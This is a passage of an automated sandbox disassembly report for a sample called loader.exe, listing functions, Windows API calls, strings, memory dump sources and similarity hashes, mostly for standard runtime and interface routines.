              • Instruction Fuzzy Hash: AB21A47160420EBBDB0C9E14DC91EBB77ADEB60B94F108138FC199B201E370EDC69692
              Function 00128FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,00140EE8,00123E14,00140EE8,?,?,00123713,00000050,?,00140EE8,00000200), ref: 00128FA9
              • _free.LIBCMT ref: 00128FDC
              • _free.LIBCMT ref: 00129004
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 00129011
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 0012901D
              • _abort.LIBCMT ref: 00129023
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$_free$_abort
              • String ID:
              • API String ID: 3160817290-0
              • Opcode ID: 730986553ad35289d1582918e64c410768a839027a69e137231a9ce49576107b
              • Instruction ID: bc18d5597c50cafaeccf404ab796a49b3d8687e5046d3a1704f62495238a0543
              • Opcode Fuzzy Hash: 730986553ad35289d1582918e64c410768a839027a69e137231a9ce49576107b
              • Instruction Fuzzy Hash: A7F028715066316BD315332D7D0AF2B2A5A9FE0760F250018F524E26D2EF20CD715118
              Function 0011D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
              Download Yara Rule
              APIs
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0011D2F2
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0011D30C
              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0011D31D
              • TranslateMessage.USER32(?), ref: 0011D327
              • DispatchMessageW.USER32(?), ref: 0011D331
              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0011D33C
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
              • String ID:
              • API String ID: 2148572870-0
              • Opcode ID: b464873353a297b43b61d9f404622e5144771ff6908ca839b953e28474195eb4
              • Instruction ID: 66e2fe6b070be37f06fe65bb83700c100b5a8bf49b886b11c901edb7acb9d511
              • Opcode Fuzzy Hash: b464873353a297b43b61d9f404622e5144771ff6908ca839b953e28474195eb4
              • Instruction Fuzzy Hash: 36F03C72A01519BBCB215BA1EC4CEDBBF6DEF51391F008022FA16D2050D7758581C7B1
              Function 0012C099 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,001289AD,?,00000000,?,00000001,?,?,00000001,001289AD,?), ref: 0012C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0012C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001267E2,?), ref: 0012C181
              • __freea.LIBCMT ref: 0012C18A
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID: ^PpL
              • API String ID: 2652629310-914357616
              • Opcode ID: 4aa9533a7de2b98babdd46fb8270a854f362f4a99a41540e389bdedf9dd99040
              • Instruction ID: 48cd754e11a0ec425572d2689b00caa045bc3dd18509ff69db313015e8b744a1
              • Opcode Fuzzy Hash: 4aa9533a7de2b98babdd46fb8270a854f362f4a99a41540e389bdedf9dd99040
              • Instruction Fuzzy Hash: A831AE72A0022AEBDB258F64EC46DAF7BA5EB54710F150228FD14D7151E735CDA1CBE0
              Function 0011C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
              Download Yara Rule
              APIs
              • _wcschr.LIBVCRUNTIME ref: 0011C435
                • Part of subcall function 001117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0010BB05,00000000,.exe,?,?,00000800,?,?,001185DF,?), ref: 001117C2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CompareString_wcschr
              • String ID: <$HIDE$MAX$MIN
              • API String ID: 2548945186-3358265660
              • Opcode ID: b0e70a5a2561b476d63b2a1e532c3feb877e530b20448b7d6c93453120401b66
              • Instruction ID: 19e766e9c9f276c19022e80c09826dcaab23de0cb8dde3b94da781d69b441bcc
              • Opcode Fuzzy Hash: b0e70a5a2561b476d63b2a1e532c3feb877e530b20448b7d6c93453120401b66
              • Instruction Fuzzy Hash: A1318372944209AADB29DA94DC41EEB77BDEF24700F0040B6FA05D6090EBB49EC4CA90
              Function 0011ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
              Download Yara Rule
              APIs
              • LoadBitmapW.USER32(00000065), ref: 0011ADFD
              • GetObjectW.GDI32(00000000,00000018,?), ref: 0011AE22
              • DeleteObject.GDI32(00000000), ref: 0011AE54
              • DeleteObject.GDI32(00000000), ref: 0011AE77
                • Part of subcall function 00119E1C: FindResourceW.KERNEL32(0011AE4D,PNG,?,?,?,0011AE4D,00000066), ref: 00119E2E
                • Part of subcall function 00119E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,0011AE4D,00000066), ref: 00119E46
                • Part of subcall function 00119E1C: LoadResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E59
                • Part of subcall function 00119E1C: LockResource.KERNEL32(00000000,?,?,?,0011AE4D,00000066), ref: 00119E64
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
              • String ID: ]
              • API String ID: 142272564-3352871620
              • Opcode ID: c428617d262a974d19afc18d36ecb2ee9ba55034aca7709ae849b262fa77379c
              • Instruction ID: 3eda93ecb739b9fbebd1bedb761cead9b456a31e4d51c7121f0cb6dc4c7826c9
              • Opcode Fuzzy Hash: c428617d262a974d19afc18d36ecb2ee9ba55034aca7709ae849b262fa77379c
              • Instruction Fuzzy Hash: B8018536943212A7CB1427A4AC15AFF7F7AAF81B02F080030FD10B7291DF718CA582B2
              Function 0011CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0010130B: GetDlgItem.USER32(00000000,00003021), ref: 0010134F
                • Part of subcall function 0010130B: SetWindowTextW.USER32(00000000,001335B4), ref: 00101365
              • EndDialog.USER32(?,00000001), ref: 0011CCDB
              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0011CCF1
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0011CD05
              • SetDlgItemTextW.USER32(?,00000068), ref: 0011CD14
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: RENAMEDLG
              • API String ID: 445417207-3299779563
              • Opcode ID: ba2fc7f33def02a221315d5793ecb2c9167acee68c709b94036f47830aac78d8
              • Instruction ID: db30345b57b1a7fb6fa96a53147ab8045c1c6c6fee45eea98e951f740dca4783
              • Opcode Fuzzy Hash: ba2fc7f33def02a221315d5793ecb2c9167acee68c709b94036f47830aac78d8
              • Instruction Fuzzy Hash: A501F5326C4310BAD5194F64AC09FAB7B9CAB9A742F100420F345A64E0C7F299848BE6
              Function 0010EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00110085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001100A0
                • Part of subcall function 00110085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0010EB86,Crypt32.dll,00000000,0010EC0A,?,?,0010EBEC,?,?,?), ref: 001100C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0010EB92
              • GetProcAddress.KERNEL32(001481C0,CryptUnprotectMemory), ref: 0010EBA2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 704bccfe91f1813f74e6a2b1aa6b19ac7377eef9aa7820d8384e79743dfe68d9
              • Instruction ID: 1cb3bd9854bf804851e56828b94f37ad8860bc445f2e82d6f162904cd2a78bd5
              • Opcode Fuzzy Hash: 704bccfe91f1813f74e6a2b1aa6b19ac7377eef9aa7820d8384e79743dfe68d9
              • Instruction Fuzzy Hash: BFE04670900741EECB259F399808B42BEE46B1870AF04885EF4E6E3680DBF5D5C08B64
              Function 0012B610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0012B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0012B63C
                • Part of subcall function 00128518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0012C13D,00000000,?,001267E2,?,00000008,?,001289AD,?,?,?), ref: 0012854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0012B662
              • _free.LIBCMT ref: 0012B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0012B684
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: fefbb83793c3c5d8a2e75cb2f0c8901a2a51b0d8783b5721709eaf192933e5e8
              • Instruction ID: 52fde679e7fe2286a07bb3a721bf1fd8367a93c4de8bb90d55b1ba50a9eeb6b7
              • Opcode Fuzzy Hash: fefbb83793c3c5d8a2e75cb2f0c8901a2a51b0d8783b5721709eaf192933e5e8
              • Instruction Fuzzy Hash: 2A01DFB2A06231BF63251ABA7CCCC7B6B6DDFC6BA13150228FD14C3110EFA18D11A1B0
              Function 00129029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(?,?,?,0012895F,001285FB,?,00128FD3,00000001,00000364,?,00123713,00000050,?,00140EE8,00000200), ref: 0012902E
              • _free.LIBCMT ref: 00129063
              • _free.LIBCMT ref: 0012908A
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 00129097
              • SetLastError.KERNEL32(00000000,?,00140EE8,00000200), ref: 001290A0
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 5e5d65385f7ebc12bf88322fdceb6fafe48ebace7109021ffce66b7aeece5b68
              • Instruction ID: 51b225f96ccf8fbbea6bfd439c0d0440df2ccc3d456b8ba826a2f50afc5fdef7
              • Opcode Fuzzy Hash: 5e5d65385f7ebc12bf88322fdceb6fafe48ebace7109021ffce66b7aeece5b68
              • Instruction Fuzzy Hash: 4101F4B2506B346BD326277D7C85A2B265D9FE07B1B350128F51592292EF648C71416C
              Function 0011075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00110A41: ResetEvent.KERNEL32(?), ref: 00110A53
                • Part of subcall function 00110A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00110A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0011078F
              • CloseHandle.KERNEL32(?,?), ref: 001107A9
              • DeleteCriticalSection.KERNEL32(?), ref: 001107C2
              • CloseHandle.KERNEL32(?), ref: 001107CE
              • CloseHandle.KERNEL32(?), ref: 001107DA
                • Part of subcall function 0011084E: WaitForSingleObject.KERNEL32(?,000000FF,00110A78,?), ref: 00110854
                • Part of subcall function 0011084E: GetLastError.KERNEL32(?), ref: 00110860
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: eb0c03343508b174157f913cc1167ae5d637a29e4b7c0fe04c1c5797dee48c1d
              • Instruction ID: b05ee34b34cffb1590d56766d77ed4f4d5bfaf3224237cfff2a77190c88fd559
              • Opcode Fuzzy Hash: eb0c03343508b174157f913cc1167ae5d637a29e4b7c0fe04c1c5797dee48c1d
              • Instruction Fuzzy Hash: A9019272944B04EBC7269B65DD84FC6BBE9FB48711F000529F16A825A0CBB56AC4CBA4
              Function 0012BF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 0012BF28
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 0012BF3A
              • _free.LIBCMT ref: 0012BF4C
              • _free.LIBCMT ref: 0012BF5E
              • _free.LIBCMT ref: 0012BF70
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 84a39a54ef0f238c76daa1922a572995f3555a3a3849937221496e76c9c6ae6e
              • Instruction ID: 266a8991160d307b8c2b4d7bbf38a56ade5b19c1c8d6021229e8e643c03ba29e
              • Opcode Fuzzy Hash: 84a39a54ef0f238c76daa1922a572995f3555a3a3849937221496e76c9c6ae6e
              • Instruction Fuzzy Hash: 60F0F932509365ABC724EFA8FEC6D1A77E9BB107107644849F048D7D90CB24FCA08A64
              Function 00128060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 0012807E
                • Part of subcall function 001284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?), ref: 001284F4
                • Part of subcall function 001284DE: GetLastError.KERNEL32(?,?,0012BFA7,?,00000000,?,00000000,?,0012BFCE,?,00000007,?,?,0012C3CB,?,?), ref: 00128506
              • _free.LIBCMT ref: 00128090
              • _free.LIBCMT ref: 001280A3
              • _free.LIBCMT ref: 001280B4
              • _free.LIBCMT ref: 001280C5
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 643f2ceab1a57ad85e01b99c0cc536dfb20f79ceb1ee15c4ea633fab1e6d5e04
              • Instruction ID: dcd98ed3d55325c4d4e2ade96be1019a9420ed74c6a4289f7ea246a439cd02f7
              • Opcode Fuzzy Hash: 643f2ceab1a57ad85e01b99c0cc536dfb20f79ceb1ee15c4ea633fab1e6d5e04
              • Instruction Fuzzy Hash: 95F05E79802275ABC7517F15FC115453BA5F72472031D464AF801A7EB0CFB108E5AFC1
              Function 0012F4A8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID:
              • String ID: ^PpL
              • API String ID: 0-914357616
              • Opcode ID: 21555ca7473de798ad9dcca7a74cf9d5673b34bd562cd552d6d26d91aa1c3ad9
              • Instruction ID: c3f1b45217742abd82610aeec79290f0bd6fa7c802b8318d36af60070879c37b
              • Opcode Fuzzy Hash: 21555ca7473de798ad9dcca7a74cf9d5673b34bd562cd552d6d26d91aa1c3ad9
              • Instruction Fuzzy Hash: CB51E07190022AAFCF149FA8EC45FAEBBB4EF59314F14003DF404A72A1C7749A62CB61
              Function 001276BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
              Download Yara Rule
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\loader.exe,00000104), ref: 001276FD
              • _free.LIBCMT ref: 001277C8
              • _free.LIBCMT ref: 001277D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\Desktop\loader.exe
              • API String ID: 2506810119-2389675944
              • Opcode ID: 75ee747f911f30fe3f54b3df2fc7f0f62e9c65e25c0b2774a20f899c0e2f2e57
              • Instruction ID: a80a236038a3bda2ba8b4db4d1998869817291d0d96e428923afd35262ae6d09
              • Opcode Fuzzy Hash: 75ee747f911f30fe3f54b3df2fc7f0f62e9c65e25c0b2774a20f899c0e2f2e57
              • Instruction Fuzzy Hash: 37318075A09228BFDB21DF99FC85D9FBBFCEB95310B1440A6E80497651D7B04E90CBA0
